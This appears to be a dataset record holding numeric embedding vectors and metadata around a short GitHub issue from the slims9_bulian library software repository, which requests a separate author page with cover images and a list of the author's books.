0.012659803964197636, 0.009900808334350586, 0.018298078328371048, 0.0017337691970169544, 0.013321361504495144, 0.02113976702094078, 0.014028024859726429, -0.003446864662691951, -0.01548645831644535, -0.0020335374865680933, -0.029980581253767014, -0.0021613382268697023, 0.02955958992242813, 0.008337127044796944, 0.005386430770158768, 0.0059502581134438515, 0.01729070581495762, 0.010720238089561462, -0.0037268989253789186, -0.018222900107502937, 0.01548645831644535, -0.02644726261496544, 0.012020799331367016, -0.0008382233791053295, 0.007600393146276474, 0.019756510853767395, 0.007066636346280575, -0.01583227328956127, -0.000014103025932854507, -0.007198195904493332, 0.0013964124955236912, -0.01002861000597477, 0.009915843605995178, -0.011284065432846546, 0.029935475438833237, -0.017546307295560837, -0.0058638048358261585, -0.010246622376143932, -0.004442959558218718, 0.010306764394044876, 0.011013427749276161, 0.006356213707476854, -0.03722764179110527, 0.01850857399404049, 0.001203771447762847, 0.026372086256742477, 0.003170589217916131, -0.00106469402089715, 0.0003427600604481995, 0.004984233994036913, 0.008487481623888016, -0.0017666590865701437, 0.000751769810449332, 0.01056988351047039, 0.02402656339108944, 0.0177116971462965, -0.012930440716445446, -0.0033622905611991882, -0.007423727307468653, 0.020433103665709496, -0.003070979844778776, -0.010359387844800949, -0.015155679546296597, -0.00307285925373435, 0.02166600711643696, 0.006946353241801262, 0.024808404967188835, -0.0073748622089624405, -0.016478795558214188, 0.005649550352245569, 0.028582289814949036, -0.02605634182691574, 0.016057804226875305, 0.012329025194048882, 0.0104044945910573, -0.003486332483589649, -0.011908033862709999, 0.009953432716429234, 0.031875040382146835, -0.0035464742686599493, -0.00001528500797576271, 0.0072357845492661, 0.004078351426869631, -0.0276801660656929, -0.013208596035838127, 0.02261323668062687, -0.012667321600019932, 0.01292292308062315, 0.011261512525379658, -0.03166454657912254, -0.004067074973136187, 0.020042182877659798, 0.010547330603003502, 0.0007216990343295038, -0.011253993958234787, -0.02867250144481659, -0.005420260597020388, 0.010494707152247429, 0.003491970943287015, 0.007525215856730938, 0.008457410149276257, 0.0043151588179171085, 0.012952994555234909, -0.021455511450767517, -0.0076267048716545105, 0.010780379176139832, -0.023395076394081116, -0.014185897074639797, -0.0032664400059729815, 0.003480694256722927, -0.004424165468662977, 0.008863366208970547, 0.029228810220956802, -0.0027063714805990458, 0.009066344238817692, -0.017666591331362724, 0.02107962593436241, -0.0029845263343304396, -0.009780525229871273, -0.028311651200056076, 0.0027044920716434717, 0.0018455949611961842, -0.018734104931354523, -0.010329317301511765, -0.01019399892538786, -0.01286278199404478, -0.004540689755231142, -0.02476329915225506, -0.004446718376129866, 0.00821684394031763, 0.020162466913461685, 0.0037287783343344927, 0.009562511928379536, 0.02786058932542801, -0.0042587760835886, -0.019485874101519585, 0.016268299892544746, -0.011690020561218262, 0.004931610077619553, -0.012133564800024033, -0.004627143498510122, -0.009058826602995396, -0.013035688549280167, -0.025469962507486343, -0.005649550352245569, 0.007615428417921066, 0.0017939107492566109, -0.005157141014933586, 0.016809573397040367, 0.02228245697915554, -0.005581891164183617, -0.019951971247792244, 0.00181364465970546, 0.0053751543164253235, 0.025830810889601707, -0.0055367848835885525, 0.007968760095536709, -0.004792532883584499, -0.00042075617238879204, 0.007694364059716463, -0.005645791534334421, -0.0038227494806051254, -0.018478501588106155, 0.017621485516428947, -0.010081233456730843, 0.0016116065671667457, 0.018809281289577484, 0.005942740477621555, 0.018658926710486412, 0.015185751020908356, -0.02282373234629631, -0.0024752020835876465, -0.03253659978508949, 0.003450623480603099, 0.006284795701503754, 0.013276254758238792, 0.00017572619253769517, -0.0065253619104623795, -0.0073748622089624405, 0.0010318041313439608, -0.009532441385090351, -0.008322091773152351, -0.0041535282507538795, -0.003614133456721902, -0.025875916704535484, 0.020884165540337563, -0.013569445349276066, 0.02303422801196575, 0.018207864835858345, -0.004901539068669081, -0.014847454614937305, 0.009592583402991295, 0.005574373062700033, 0.0187792107462883, -0.00417232234030962, -0.022162174805998802, 0.018553679808974266, 0.021395368501544, -0.002262827241793275, 0.0076605346985161304, 0.006856140680611134, -0.005003028083592653, 0.01649383082985878, 0.012569591403007507, 0.005886357743293047, 0.030536890029907227, -0.012907887808978558, -0.002868001814931631, -0.0050894818268716335, -0.00004404901483212598, 0.004585796035826206, -0.021711112931370735, -0.016208156943321228, 0.003901685355231166, 0.009502370841801167, 0.006390043534338474, -0.010945769026875496, 0.0064351498149335384, 0.0005704053328372538, 0.013607033528387547, 0.004683526232838631, 0.0045632426626980305, -0.011013427749276161, -0.021229980513453484, -0.02572556398808956, 0.004457995295524597, 0.020628564059734344, -0.0015711989253759384, -0.020959343761205673, 0.020959343761205673, 0.01926034316420555, -0.006574227008968592, -0.022853802889585495, -0.022237351164221764, -0.026747969910502434, -0.0008288262179121375, 0.0048639508895576, 0.005694656632840633, -0.014231002889573574, 0.00000565295658816467, 0.009502370841801167, 0.01689978502690792, 0.007408691570162773, 0.010577401146292686, -0.013516821898519993, -0.003191262949258089, 0.0055029550567269325, -0.01114122848957777, -0.019621193408966064, -0.003161192173138261, -0.005003028083592653, -0.006780963856726885, 0.0208089891821146, -0.020748848095536232, -0.01852360926568508, -0.014584334567189217, -0.004957921802997589, 0.012178671546280384, -0.0056269969791173935, -0.009231733158230782, -0.011810303665697575, -0.015253409743309021, -0.004108421970158815, 0.0006972665432840586, -0.012697392143309116, -0.007780817802995443, -0.0029319024179130793, -0.011126193217933178, -0.005871322471648455, -0.009803078137338161, -0.008615282364189625, 0.016057804226875305, -0.010171446017920971, -0.016944892704486847, 0.0011295342119410634, 0.002854845952242613, 0.003168709808960557, -0.0049240924417972565, -0.008878401480615139, 0.0025391026865690947, -0.010539812967181206, -0.008194291032850742, 0.01574205979704857, -0.010141375474631786, -0.010457118041813374, -0.016178086400032043, 0.02504897117614746, 0.000052888182835886255, 0.011066052131354809, -0.028852926567196846, 0.0031330008059740067, 0.005675862077623606, 0.020839059725403786, 0.007976277731359005, -0.010073715820908546, -0.002080522943288088, -0.01858375035226345, -0.015907449647784233, -0.00420615216717124, -0.0009650845313444734, 0.0013531857402995229, 0.014712135307490826, -0.016448723152279854, -0.010953286662697792, 0.008592729456722736, 0.021711112931370735, 0.009314428083598614, 0.008675423450767994, 0.008404786698520184, -0.006536638829857111, -0.009690312668681145, 0.011374277994036674, 0.008043937385082245, 0.005059410817921162, -0.007855994626879692, 0.001969636883586645, 0.009945915080606937, 0.006905005779117346, -0.006220895331352949, -0.008502516895532608, -0.022583166137337685, -0.011096122674643993, -0.0004418996977619827, 0.011118675582110882, -0.006322384346276522, -0.00666443957015872, -0.009209180250763893, -0.006390043534338474, 0.01541128195822239, 0.004123457707464695, 0.007758264429867268, 0.0009632051223888993, 0.014215967617928982, 0.010472153313457966, -0.010787896811962128, -0.0009486395283602178, -0.021846430376172066, -0.0018916408298537135, -0.014095684513449669, -0.0007484808447770774, -0.011690020561218262, 0.001812704955227673, -0.01858375035226345, 0.022523025050759315, -0.000829296070151031, -0.0038152318447828293, 0.012592144310474396, -0.023680750280618668, -0.0031198447104543447, -0.01763652078807354, 0.007604151964187622, 0.019485874101519585, -0.007923654280602932, -0.0037156224716454744, 0.015802202746272087, 0.0018869423074647784, -0.005642032716423273, 0.01730574108660221, 0.0015965711791068316, 0.003931756131350994, -0.031935181468725204, -0.0019452044507488608, -0.0031048094388097525, 0.019350554794073105, 0.00858521182090044, -0.008976131677627563, -0.014779794961214066, 0.010224069468677044, 0.01972644031047821, -0.0048000505194067955, -0.0037701257970184088, -0.02007225528359413, 0.008743083104491234, -0.009374570101499557, -0.006668198388069868, 0.0021387850865721703, 0.029183704406023026, 0.0017328294925391674, 0.005848769098520279, 0.013637105002999306, 0.007728193886578083, 0.009171592071652412, 0.016644183546304703, -0.004318917635828257, -0.008307056501507759, -0.0037475726567208767, 0.0054089841432869434, -0.017681626603007317, 0.008848330937325954, -0.0033810848835855722, 0.0023286070208996534, 0.015727024525403976, 0.000828356365673244, 0.011193852871656418, 0.0036949487403035164, -0.008803225122392178, 0.012787604704499245, -0.0015834152000024915, -0.007442521397024393, -0.006348696071654558, -0.03791927173733711, -0.0046045901253819466, -0.011862928047776222, -0.0038171112537384033, -0.01384008303284645, -0.0006827009492553771, 0.0068862116895616055, 0.0013907741522416472, -0.011434419080615044, 0.008765636011958122, 0.004059556871652603, 0.005893875379115343, -0.026011236011981964, -0.007923654280602932, -0.021560758352279663, -0.01178023312240839, 0.03605487942695618, -0.01224633026868105, -0.013065760023891926, 0.01538121048361063, 0.0005586589686572552, -0.016538936644792557, 0.007544010411947966, -0.014351285994052887, 0.01965126395225525, -0.0008791008731350303, -0.004717355594038963, 0.028777748346328735, -0.002121870405972004, 0.0201323963701725, -0.010276693850755692, -0.02927391789853573, -0.015080503188073635, -0.0010101906955242157, -0.0024921169970184565, -0.00996095035225153, 0.008555140346288681, -0.023334935307502747, 0.0023624366149306297, 0.012577109038829803, 0.006281036883592606, 0.005694656632840633, -0.014524193480610847, 0.007442521397024393, -0.024612944573163986, 0.009840667247772217, 0.00669826939702034, -0.009336980991065502, -0.0021914090029895306, 0.007265855558216572, -0.0010195878567174077, 0.012035834603011608, 0.0017892122268676758, -0.015396245755255222, 0.001047779223881662, 0.0013099589850753546, 0.004450477194041014, 0.006668198388069868, -0.012073423713445663, -0.007825924083590508, 0.006720822304487228, 0.004815085791051388, -0.0005713450955227017, -0.000023669002985116094, -0.00668323365971446, 0.0035709065850824118, 0.011622361838817596, 0.030581995844841003, 0.0005497316597029567, -0.009164074435830116, -0.01932048425078392, 0.0014659512089565396, -0.022102033719420433, 0.00755528686568141, -0.0031236037611961365, 0.00300332042388618, 0.0070516010746359825, -0.0035427152179181576, 0.016343476250767708, 0.006656921934336424, 0.002095558447763324, -0.017651556059718132, -0.003640445414930582, 0.00135036651045084, 0.008705494925379753, 0.002728924388065934, -0.010246622376143932, -0.019440768286585808, 0.013441644608974457, -0.008194291032850742, -0.013779941014945507, -0.011359241791069508, 0.0016266419552266598, -0.016734397038817406, 0.00328899291343987, 0.007333514746278524, -0.007743229158222675, -0.013779941014945507, -0.008276985958218575, 0.008592729456722736, 0.0005788627895526588, 0.005311253946274519, 0.007292167283594608, -0.027890659868717194, 0.009667759761214256, 0.00787854753434658, -0.0214855819940567, 0.019275378435850143, -0.0055405437014997005, -0.007258337922394276, 0.022868838161230087, 0.014674547128379345, 0.029123563319444656, -0.0004924092208966613, -0.020342892035841942, 0.0014302420895546675, 0.006544156465679407, 0.0011173179373145103, -0.01167498528957367, 0.004450477194041014, -0.014012989588081837, -0.009118967689573765, 0.025424854829907417, 0.04522647336125374, -0.010712720453739166, -0.011720092035830021, -0.014742206782102585, 0.0012329025194048882, -0.012975547462701797, -0.004796291701495647, -0.00017713576380629092, -0.002084281761199236, 0.026296908035874367, 0.008149185217916965, 0.007476350758224726, 0.010592437349259853, 0.0017600811552256346, -0.023515360429883003, 0.006390043534338474, 0.012111011892557144, 0.003599097952246666, 0.0068523818626999855, -0.005190970841795206, 0.02067366987466812, -0.0125846266746521, -0.0022158415522426367, 0.01396788377314806, -0.001952722086571157, 0.013591998256742954, 0.01281767524778843, 0.02261323668062687, 0.011607326567173004, 0.00978804286569357, 0.013178525492548943, -0.013373984955251217, -0.0025071525014936924, 0.00858521182090044, -0.014268591068685055, -0.005029340274631977, 0.0022083239164203405, -0.0016867835074663162, -0.0109382513910532, -0.01006619818508625, -0.00511579355224967, 0.009118967689573765, 0.00025677637313492596, 0.012268883176147938, -0.0034205527044832706, 0.023064298555254936, 0.005243594758212566, 0.01275753416121006, 0.010787896811962128, 0.01063754316419363, -0.003924238495528698, 0.011900516226887703, -0.0023248482029885054, -0.010825485922396183, -0.00844989251345396, -0.018613820895552635, -0.006333660800009966, 0.007044083438813686, -0.032807234674692154, 0.003195021767169237, 0.012261365540325642, 0.01817779429256916, 0.021154802292585373, 0.01702006906270981, -0.019275378435850143, 0.004867709707468748, 0.008953578770160675, 0.000831175537314266, -0.016253264620900154, 0.007871029898524284, -0.006514085456728935, 0.0030860151164233685, -0.004018209874629974, 0.013133418746292591, -0.013419091701507568, 0.016599077731370926, 0.009757972322404385, 0.0005788627895526588, -0.0035464742686599493, 0.009570029564201832, 0.009923362173140049, -0.005472884513437748, 0.0003382964350748807, 0.0020917996298521757, -0.010667613707482815, 0.0028435694985091686, -0.0068523818626999855, 0.01184789277613163, 0.007205714005976915, 0.008735565468668938, -0.02026771381497383, 0.01117129996418953, -0.02334997057914734, -0.008209326304495335, -0.018899492919445038, 0.01184789277613163, 0.008269468322396278, -0.007698122877627611, 0.0011812183074653149, -0.016253264620900154, 0.012336542829871178, 0.0042738113552331924, 0.007025288883596659, 0.008149185217916965, -0.009314428083598614, 0.014035542495548725, 0.007352308835834265, 0.002150061773136258, 0.010396976955235004, 0.02166600711643696, -0.004931610077619553, -0.024612944573163986, 0.003610374638810754, -0.018283043056726456, -0.0011173179373145103, -0.017952263355255127, -0.0037456932477653027, 0.010133856907486916, 0.0278756245970726, -0.0004451886925380677, 0.004330194089561701, -0.03211560845375061, -0.0035803038626909256, -0.00013931235298514366, -0.0008819199865683913, -0.023921316489577293, -0.012892852537333965, -0.0003197370970156044, 0.010652578435838223, -0.007126777898520231, -0.009532441385090351, -0.014847454614937305, 0.015636812895536423, 0.0003185624664183706, -0.02799590863287449, 0.01992190070450306, -0.019771546125411987, 0.022162174805998802, 0.01450915727764368, 0.0018925805343315005, 0.014794830232858658, 0.020478209480643272, -0.00726961437612772, -0.010735273361206055, 0.00868294108659029, 0.025800740346312523, 0.007371103391051292, -0.0035408358089625835, -0.009344498626887798, 0.005634515080600977, -0.007224508095532656, 0.017080210149288177, 0.004672249313443899, -0.01668928936123848, 0.015088020823895931, 0.00926180463284254, -0.008464928716421127, -0.02174118347465992, 0.009991020895540714, 0.0004113590402994305, 0.002997682197019458, 0.009742937050759792, -0.08864869922399521, -0.01074279099702835, 0.012780087068676949, -0.009697831235826015, 0.008878401480615139, 0.009013719856739044, 0.026432227343320847, -0.002982646692544222, 0.01790715754032135, -0.0023173305671662092, 0.00005520809645531699, -0.0034186732955276966, -0.0038866500835865736, -0.015230856835842133, -0.014261073432862759, -0.015696953982114792, 0.008036419749259949, 0.012870299629867077, -0.016508866101503372, 0.00828450359404087, 0.0065667093731462955, 0.017185458913445473, -0.01729070581495762, -0.017050139605998993, 0.007611669600009918, 0.013125901110470295, 0.014824900776147842, -0.02222231589257717, -0.01541128195822239, 0.0054991962388157845, -0.004691043868660927, 0.01211852952837944, 0.009058826602995396, 0.01480986550450325, 0.010043645277619362, -0.01343412697315216, 0.006281036883592606, -0.017275670543313026, -0.003478814847767353, 0.006995218340307474, -0.00459707248955965, -0.010750308632850647, 0.017681626603007317, 0.021620899438858032, -0.0011671226238831878, -0.016749432310461998, -0.008592729456722736, 0.0014048698358237743, -0.012674839235842228, 0.004262534901499748, -0.025018900632858276, 0.017080210149288177, -0.00028919646865688264, -0.011735127307474613, 0.0001215752781718038, 0.008254433050751686, -0.004732390865683556, -0.03978366032242775, 0.0014922631671652198, -0.007833441719412804, -0.009239250794053078, -0.019801616668701172, -0.005852527916431427, 0.00604047067463398, 0.004164804704487324, -0.006205860059708357, 0.007600393146276474, 0.011532149277627468, -0.006623092107474804, -0.005442813504487276, -0.004987992811948061, -0.0245828740298748, 0.01777183823287487, 0.01265228632837534, 0.0030954123940318823, -0.0005671163671649992, -0.007457556668668985, 0.000537985295522958, -0.012126047164201736, 0.004969198722392321, 0.01581723801791668, -0.0017610208597034216, 0.003777643432840705, -0.02113976702094078, 0.004202393349260092, -0.004559483844786882, 0.020778918638825417, 0.003905444173142314, 0.007645498961210251, -0.012058388441801071, -0.00520224729552865, -0.0017638399731367826, -0.017651556059718132, 0.01883935183286667, 0.011487043462693691, -0.007092948537319899, 0.0064764972776174545, 0.013246184214949608, 0.006551674101501703, 0.008998684585094452, -0.00632614316418767, -0.014599369838833809, 0.012253847904503345, -0.0020767641253769398, 0.008525069802999496, 0.006205860059708357, 0.021696077659726143, -0.015546600334346294, 0.01245682593435049, -0.008269468322396278, 0.025018900632858276, 0.027650093659758568, -0.008592729456722736, 0.017456095665693283, -0.010396976955235004, 0.008622800000011921, 0.0078409593552351, 0.00864535290747881, -0.016328440979123116, -0.003181865904480219, 0.013817529194056988, 0.011750162579119205, 0.002390627982094884, 0.0053751543164253235, 0.005070687737315893, 0.009870737791061401, 0.003775764023885131, 0.00864535290747881, -0.0020880408119410276, 0.005164658650755882, 0.01723056472837925, 0.02249295264482498, -0.004442959558218718, -0.015373692847788334, 0.00942719355225563, -0.025259466841816902, 0.03238624334335327, -0.00509699946269393, 0.013171007856726646, -0.013471715152263641, 0.005307495128363371, 0.007938689552247524, 0.00335853174328804, -0.004435441922396421, -0.010141375474631786, 0.0014668909134343266, -0.030401572585105896, 0.0016322802985087037, -0.005901393014937639, 0.0211999099701643, 0.01790715754032135, 0.0012225656537339091, -0.0010468395194038749, 0.004130975343286991, -0.002283500973135233, 0.006089335773140192, 0.013546892441809177, 0.01628333516418934, -0.003499488579109311, -0.011329171247780323, 0.019079918041825294, -0.0026481093373149633, -0.022102033719420433, 0.015193268656730652, -0.0014321214985102415, -0.0035577507223933935, -0.0023022950626909733, -0.01299058273434639, 0.00725457863882184, -0.001194374286569655, 0.008149185217916965, 0.023004157468676567, -0.014351285994052887, -0.003612254047766328, 0.028642430901527405, 0.0012460584985092282, -0.01359951589256525, -0.017185458913445473, 0.022718483582139015, -0.005781109910458326, -0.011118675582110882, -0.0030972918029874563, -0.0008927266462706029, -0.011690020561218262, -0.004754944238811731, 0.004382818005979061, 0.0029619731940329075, 0.004987992811948061, -0.004262534901499748, -0.004446718376129866, 0.016343476250767708, 0.027905697003006935, 0.019891830161213875, 0.0009688433492556214, 0.009517406113445759, -0.010396976955235004, 0.0030766180716454983, -0.003905444173142314, -0.014110719785094261, 0.009991020895540714, 0.01338902022689581, -0.0013766784686595201, 0.005946499295532703, -0.007025288883596659, -0.029574625194072723, -0.010374424047768116, 0.009750454686582088, 0.02026771381497383, -0.006104371044784784, 0.003805834800004959, 0.02510911226272583, -0.0009942156029865146, 0.007901101373136044, -0.01315597165375948, -0.013125901110470295, -0.012840229086577892, -0.00029131080373190343, 0.009367052465677261, 0.0004980475059710443, 0.031333766877651215, 0.034912191331386566, 0.008555140346288681, 0.004781255964189768, 0.012975547462701797, 0.0006150417029857635, -0.010224069468677044, -0.0014133272925391793, -0.0049240924417972565, 0.006668198388069868, 0.018884457647800446, -0.017531272023916245, -0.014629441313445568, 0.01939566247165203, 0.022568130865693092, 0.013531857170164585, 0.022898908704519272, -0.00932194571942091, 0.0021575794089585543, 0.00429260591045022, -0.004995510447770357, 0.021034520119428635, 0.029168669134378433, 0.001209409674629569, -0.013772423379123211, -0.014862489886581898, 0.0019000982865691185, 0.026342015713453293, 0.009585065767168999, -0.011359241791069508, -0.009780525229871273, 0.02841689996421337, 0.006502809002995491, -0.020433103665709496, 0.033829640597105026, 0.0047662206925451756, -0.0008358740597032011, 0.006284795701503754, 0.0021613382268697023, 0.008795706555247307, 0.0029262639582157135, -0.0028492077253758907, -0.00019099652126897126, 0.017260635271668434, 0.016929857432842255, 0.005999123211950064, 0.02073381282389164, 0.009502370841801167, -0.001522333943285048, -0.0016332200029864907, -0.004033245146274567, 0.0059540169313549995, -0.010817968286573887, -0.01329129096120596, -0.023590536788105965, -0.015727024525403976, -0.0035295593552291393, -0.01823793537914753, -0.017666591331362724, -0.001645436161197722, 0.001663290779106319, -0.015200786292552948, -0.017005033791065216, -0.02772527188062668, -0.023455219343304634, 0.014253555797040462, 0.012742498889565468, -0.03289744630455971, 0.0038490614388138056, -0.005044375546276569, 0.018884457647800446, 0.003486332483589649, -0.006134441588073969, 0.007438762579113245, -0.007273373194038868, -0.0344611294567585, -0.0201323963701725, -0.007901101373136044, 0.004442959558218718, -0.008600247092545033, 0.012359095737338066, -0.005961534567177296, -0.001986551797017455, -0.019365590065717697, 0.00030587633955292404, -0.011269030161201954, -0.01649383082985878, -0.010103786364197731, -0.0070177712477743626, -0.0005525508313439786, 0.0021613382268697023, 0.005736003629863262, -0.016599077731370926, 0.01080293208360672, 0.005833733826875687, -0.01386263594031334, 0.0313638374209404, -0.00669826939702034, -0.008419821970164776, -0.0009190386044792831, -0.019004741683602333, 0.0070140124298632145, 0.009570029564201832, -0.005600685253739357, -0.010118821635842323, 0.024206988513469696, 0.018162759020924568, 0.016989998519420624, -0.006656921934336424, 0.0058600460179150105, 0.0137949762865901, 0.006818552501499653, -0.004792532883584499, -0.004536930937319994, 0.03527304157614708, -0.0003350074402987957, 0.00790861900895834, -0.01695992797613144, -0.017125315964221954, -0.017726732417941093, 0.002221479779109359, 0.0018643891671672463, -0.005190970841795206, -0.012998100370168686, -0.0024733226746320724, 0.00541650177910924, -0.006138200871646404, -0.005705933086574078, -0.015666883438825607, 0.002834172220900655, 0.009585065767168999, -0.007694364059716463, 0.0053789131343364716, -0.0031386390328407288, 0.020824024453759193, 0.017816945910453796, 0.008329609408974648, 0.018553679808974266, 0.0007254579104483128, 0.005138346925377846, 0.02834172174334526, -0.024988830089569092, -0.014824900776147842, 0.003215695498511195, -0.026838183403015137, 0.0014950822805985808, -0.0066869924776256084, 0.014095684513449669, 0.023319900035858154, -0.014441498555243015, 0.003738175379112363, -0.00898364931344986, -0.004397853277623653, -0.010186481289565563, 0.06777957081794739, 0.005311253946274519, -0.001956481020897627, -0.006720822304487228, -0.009983503259718418, 0.023665715008974075, -0.015847308561205864, 0.04495583474636078, 0.007081671617925167, 0.010276693850755692, 0.015313551761209965, -0.002554137958213687, -0.0018615700537338853, -0.00007817231380613521, 0.0032927519641816616, 0.004567001946270466, 0.009306910447776318, -0.009021238423883915, -0.03055192530155182, 0.0023436425253748894, -0.016719361767172813, 0.0011257752776145935, -0.012020799331367016, 0.0020222608000040054, 0.004939127713441849, 0.00011452743638074026, -0.011193852871656418, -0.01744106039404869, 0.0020523315761238337, 0.0205233171582222, -0.026372086256742477, -0.010457118041813374, 0.01953097991645336, 0.010885627008974552, -0.025905989110469818, 0.0003220863873139024, -0.011524631641805172, 0.0034111556597054005, -0.005705933086574078, 0.011411866173148155, -0.007059118710458279, 0.010524777695536613, 0.0006667258567176759, -0.0245828740298748, 0.021094661206007004, -0.013622069731354713, -0.0139378122985363, 0.01924530789256096, 0.010825485922396183, -0.02288387343287468, -0.006367490626871586, 0.02067366987466812, 0.012043352238833904, -0.012148600071668625, 0.013637105002999306, -0.01493766624480486, 0.00841230433434248, 0.018343184143304825, 0.004055798053741455, 0.012253847904503345, 0.013171007856726646, 0.005969052668660879, -0.002150061773136258, 0.00026077014626935124, 0.004852674435824156, -0.01268987450748682, -0.016538936644792557, -0.0072357845492661, -0.005484160967171192, 0.023139474913477898, -0.018944600597023964, -0.013539374805986881, 0.015118091367185116, -0.013118383474647999, 0.0010806691134348512, -0.0027552363462746143, 0.03434084728360176, 0.005634515080600977, 0.000905882625374943, 0.011351724155247211, 0.011073569767177105, 0.023440184071660042, -0.024071669206023216, 0.0245828740298748, -0.003491970943287015, 0.006322384346276522, 0.010690166614949703, 0.004341470543295145, 0.0020692464895546436, 0.00864535290747881, -0.013268737122416496, 0.005514231510460377, -0.01629837043583393, -0.023004157468676567, 0.0008105018641799688, 0.0030634619761258364, -0.003758849110454321, -0.0013785578776150942, 0.013050723820924759, -0.013847600668668747, 0.0017130954656749964, 0.01103598065674305, -0.00635997299104929, -0.022252386435866356, 0.02079395391047001, 0.018268007785081863, 0.01683964394032955, 0.00915655680000782, -0.032416313886642456, -0.014569299295544624, -0.01965126395225525, -0.007931171916425228, 0.006356213707476854, 0.015531565062701702, -0.0024470107164233923, -0.013689728453755379, -0.0011229561641812325, 0.001512936782091856, -0.0006394741940312088, -0.012772569432854652, 0.013516821898519993, 0.009991020895540714, -0.012825192883610725, 0.014351285994052887, -0.002740201074630022, 0.00033618207089602947, 0.003623530501499772, -0.010539812967181206, 0.014922630973160267, 0.02363564260303974, 0.0024770814925432205, -0.03864096850156784, -0.00018030729552265257, 0.013426609337329865, 0.0344611294567585, 0.008389751426875591, 0.0013776181731373072, -0.0177116971462965, -0.0025240671820938587, 0.010562365874648094, 0.006209618877619505, 0.006972664967179298, 0.015351139940321445, 0.003976862411946058, 0.01241923775523901, 0.008104078471660614, 0.008126632310450077, -0.007566563319414854, 0.028852926567196846, 0.017140351235866547, 0.01281767524778843, -0.011862928047776222, 0.010457118041813374, 0.0001413092395523563, 0.021996784955263138, -0.009239250794053078, -0.029258882626891136, -0.0042775701731443405, 0.019696369767189026, 0.015546600334346294, -0.0032062982209026814, 0.009269322268664837, 0.032416313886642456, -0.003924238495528698, 0.002384989755228162, -0.03154426068067551, 0.0054127429611980915, 0.019741475582122803, 0.00457827840000391, -0.018207864835858345, 0.006307349074631929, -0.0035445948597043753, -0.010487189516425133, -0.011299100704491138, -0.013321361504495144, 0.0070516010746359825, 0.002135026268661022, -0.02873264253139496, -0.024658050388097763, -0.016042768955230713, 0.0020222608000040054, 0.007758264429867268, 0.011193852871656418, 0.044594984501600266, -0.00491657480597496, -0.0013306326000019908, 0.0045143780298531055, 0.02032785676419735, 0.013005618005990982, -0.0014668909134343266, 0.018493538722395897, -0.009983503259718418, -0.0010026730597019196, -0.009637689217925072, 0.012667321600019932, 0.020027147606015205, 0.010539812967181206, 0.00008574874664191157, -0.01413327269256115, 0.018688997253775597, 0.002696974202990532, -0.01383256446570158, -0.014779794961214066, -0.010562365874648094, -0.017922192811965942, 0.029108528047800064, -0.01897467114031315, 0.008269468322396278, -0.028642430901527405, -0.002725165570154786, 0.0035671477671712637 ]
null
null
null
null
null
null
null
null
null
[ "slims", "slims9_bulian" ]
It would be nice to add a separate page for authors with cover information and a list of his books
A separate page for the author with a cover
https://api.github.com/repos/slims/slims9_bulian/issues/178/comments
3
2023-01-04T14:23:12
2023-01-07T12:48:05Z
https://github.com/slims/slims9_bulian/issues/178
1,519,066,659
178
false
This is a GitHub Issue repo:slims9_bulian owner:slims Title : A separate page for the author with a cover Issue date: --- start body --- It would be nice to add a separate page for authors with cover information and a list of his books --- end body ---
256
[ 0.01268345769494772, -0.005887887440621853, -0.022892877459526062, -0.042990416288375854, -0.004570542834699154, -0.0230695940554142, -0.0016617417568340898, 0.04575362429022789, -0.03278902545571327, 0.06959434598684311, -0.030154338106513023, 0.022426987066864967, -0.013960639014840126, -0.024531526491045952, -0.014739800244569778, 0.0011486602015793324, -0.025125937536358833, 0.0010572895407676697, -0.0030202532652765512, 0.007695219945162535, -0.019149690866470337, 0.006165011785924435, -0.02520626410841942, 0.045335929840803146, 0.03296574577689171, 0.0012892305385321379, -0.028788797557353973, 0.001573383342474699, -0.01672384887933731, 0.02645934745669365, 0.05066956952214241, 0.015663547441363335, -0.008900108747184277, -0.013044924475252628, -0.008932238444685936, -0.020097536966204643, 0.01106890756636858, 0.07216477394104004, -0.045560844242572784, 0.0021206033416092396, 0.012257730588316917, -0.019037235528230667, -0.00874748919159174, -0.0033957769628614187, -0.0022511330898851156, -0.006570657715201378, 0.013727693818509579, -0.02951173111796379, -0.02678065001964569, 0.01503700576722622, 0.011703481897711754, -0.05041252821683884, -0.011663318611681461, -0.03460439294576645, -0.03213035315275192, -0.006450168788433075, 0.04568936303257942, 0.013599172234535217, -0.008124963380396366, 0.012265763245522976, -0.0071249064058065414, -0.0237764623016119, 0.02416202612221241, 0.011173331178724766, 0.020627688616514206, 0.02284468151628971, -0.02907797135412693, 0.012297892943024635, -0.0406770296394825, 0.04029146581888199, 0.04915944114327431, 0.020756209269165993, 0.04405071586370468, 0.02814619056880474, 0.01093235332518816, -0.00043727405136451125, 0.049930572509765625, 0.0065867225639522076, -0.031455617398023605, -0.015551092103123665, -0.02557576261460781, 0.009301737882196903, -0.08244649320840836, 0.00736588379368186, 0.020563427358865738, -0.043504498898983, 0.006361810490489006, -0.08527395874261856, 0.0054059321992099285, 0.009912214241921902, -0.018764127045869827, -0.02197716198861599, 0.01525388564914465, 0.001490045222453773, 0.05908772349357605, -0.025704283267259598, 0.023423029109835625, 0.021671924740076065, -0.001705921022221446, -0.03968098759651184, -0.009277639910578728, -0.008361924439668655, -0.015141429379582405, -0.03502208739519119, 0.017719890922307968, 0.008116930723190308, 0.02284468151628971, -0.053657691925764084, 0.011125135235488415, -0.0057031381875276566, 0.04620344936847687, -0.004309483803808689, -0.06689539551734924, -0.008940271101891994, -0.019760169088840485, 0.012924435548484325, -0.0094864871352911, -0.015551092103123665, -0.02886912412941456, -0.04710309952497482, -0.02300533466041088, -0.03881346806883812, -0.02115783840417862, -0.04051637649536133, -0.015406505204737186, -0.0012741694226861, -0.030845141038298607, 0.01180790551006794, 0.04128750413656235, 0.02739112824201584, -0.006333696190267801, 0.018555279821157455, 0.010562853887677193, -0.032114289700984955, -0.025382980704307556, -0.005811578128486872, 0.01237821951508522, 0.01592862419784069, -0.009020596742630005, -0.029222557321190834, -0.01377588976174593, -0.03569682314991951, 0.015776004642248154, 0.012940500862896442, -0.03704629838466644, -0.023133855313062668, -0.0003002180019393563, -0.01233002357184887, -0.004450054373592138, 0.007478340063244104, 0.004205060191452503, -0.023953178897500038, -0.024997416883707047, 0.03772103786468506, 0.024338744580745697, 0.0028957482427358627, -0.007787594571709633, -0.0021447010803967714, 0.0006662028026767075, -0.012450512498617172, -0.02502954564988613, -0.0008017527870833874, 0.01393654104322195, -0.008377989754080772, -0.012056916020810604, -0.027921278029680252, 0.01770382560789585, 0.02536691538989544, -0.0009629065752960742, 0.018667737022042274, -0.021671924740076065, -0.0032531984616070986, -0.015462732873857021, -0.03269263729453087, -0.015920590609312057, 0.0029198459815233946, 0.043600890785455704, -0.0217040553689003, -0.023262377828359604, 